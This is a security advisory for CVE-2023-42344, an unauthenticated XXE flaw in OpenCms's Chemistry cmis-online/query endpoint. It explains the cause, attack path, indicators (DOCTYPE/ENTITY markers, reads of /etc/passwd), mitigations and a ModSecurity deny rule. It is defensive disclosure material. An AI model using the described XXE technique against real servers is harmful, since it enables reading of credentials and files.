CVE-2023-42344: Alkacon OpenCMS XXE Vulnerability

CVE-2023-42344 Overview

CVE-2023-42344 is an XML External Entity (XXE) vulnerability affecting Alkacon OpenCms versions prior to 10.5.1. The flaw resides in the Apache Chemistry servlet exposed by OpenCms, specifically the cmis-online/query endpoint. Remote unauthenticated attackers can submit crafted XML payloads that trigger external entity resolution. Successful exploitation allows the attacker to read sensitive files from the server, perform internal network reconnaissance, and potentially exfiltrate credentials or configuration data. The vulnerability is categorized under [CWE-611] (Improper Restriction of XML External Entity Reference).

Critical Impact

Unauthenticated remote attackers can extract sensitive server-side files and probe internal networks through XXE injection on the OpenCms Chemistry servlet.

Affected Products

• Alkacon OpenCms versions prior to 10.5.1
• OpenCms deployments exposing the Apache Chemistry CMIS servlet
• Web applications using the cmis-online/query endpoint

Discovery Timeline

• 2026-05-08 - CVE-2023-42344 published to NVD
• 2026-05-08 - Last updated in NVD database

Technical Details for CVE-2023-42344

Vulnerability Analysis

The vulnerability stems from improper XML parser configuration in the OpenCms integration of the Apache Chemistry CMIS (Content Management Interoperability Services) servlet. The servlet accepts XML-formatted query requests at the cmis-online/query path. The underlying XML parser processes external entity declarations without restriction. Attackers can define malicious DOCTYPE entities that reference local files via file:// URIs or remote resources via http:// URIs.

When the parser resolves these entities, file contents or HTTP response data are reflected in the server response or trigger out-of-band data exfiltration. Because the endpoint requires no authentication, exploitation can be performed by any network-adjacent attacker who can reach the OpenCms instance. The Watchtowr Labs analysis demonstrates extraction of system files and internal service enumeration through blind and in-band XXE techniques.

Root Cause

The root cause is the use of a default-configured XML parser that does not disable external entity resolution and DTD processing. Apache Chemistry's query handler deserializes user-supplied XML without applying secure parser features such as FEATURE_SECURE_PROCESSING, disallow-doctype-decl, or external entity restrictions.

Attack Vector

An attacker sends an HTTP POST request to the cmis-online/query endpoint containing an XML body with a malicious DOCTYPE declaration. The DOCTYPE defines an external entity referencing a local file path or attacker-controlled URL. The OpenCms server parses the XML, resolves the entity, and returns the referenced content in the response or sends it out-of-band to the attacker's listener.

Technical details and proof-of-concept exploitation are documented in the Watchtowr Labs Analysis and the Nuclei Templates GitHub Issue Discussion.

Detection Methods for CVE-2023-42344

Indicators of Compromise

• HTTP POST requests to URIs containing cmis-online/query from external or unexpected sources
• XML request bodies containing <!DOCTYPE, <!ENTITY, SYSTEM, or file:// declarations
• Outbound HTTP, FTP, or DNS connections from the OpenCms server to unfamiliar hosts following Chemistry servlet requests
• Application logs showing XML parsing errors referencing external entities or unresolved system identifiers

Detection Strategies

• Inspect web server and application logs for requests targeting the cmis-online/query path with XML content types
• Deploy web application firewall (WAF) signatures that flag DOCTYPE and ENTITY declarations in request bodies
• Monitor egress traffic from OpenCms hosts for anomalous outbound connections to non-business destinations
• Hunt for sequential reads of sensitive files such as /etc/passwd, web.xml, or OpenCms configuration files by the Java process

Monitoring Recommendations

• Enable verbose request logging on reverse proxies fronting OpenCms to capture full XML payloads
• Forward application and network telemetry to a centralized data lake for correlation across hosts
• Alert on first-seen outbound DNS resolutions from OpenCms servers, which are common in blind XXE exfiltration
• Track EPSS movement for this CVE given its current high percentile to prioritize hunt cadence

How to Mitigate CVE-2023-42344

Immediate Actions Required

• Upgrade Alkacon OpenCms to version 10.5.1 or later, where the XML parser configuration has been hardened
• Restrict access to the cmis-online/query endpoint via network ACLs or reverse proxy rules until patching is complete
• Audit OpenCms logs for prior exploitation attempts referencing DOCTYPE or external entities
• Rotate credentials and secrets that may have been exposed in files readable by the OpenCms process

Patch Information

Upgrade to Alkacon OpenCms 10.5.1 or any later supported release. The fix disables external entity resolution and DTD processing in the Apache Chemistry query handler. Verify the deployed version after upgrade and confirm the patched parser configuration through functional testing of the cmis-online/query endpoint.

Workarounds

• Block external access to /cmis-online/* paths at the load balancer or reverse proxy
• Remove or disable the Chemistry servlet mapping in web.xml if CMIS functionality is not required
• Apply WAF rules that reject XML payloads containing <!DOCTYPE or <!ENTITY declarations on the affected endpoint
• Restrict the OpenCms service account's filesystem permissions to limit data exposure if XXE is exploited

# Configuration example: WAF rule pattern to block XXE payloads
# ModSecurity rule to reject DOCTYPE/ENTITY in Chemistry servlet requests
SecRule REQUEST_URI "@contains /cmis-online/query" \
    "id:1001001,phase:2,deny,status:403,\
    chain,msg:'Potential XXE in OpenCms Chemistry servlet'"
    SecRule REQUEST_BODY "@rx (?i)(<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"'])" \
        "t:none"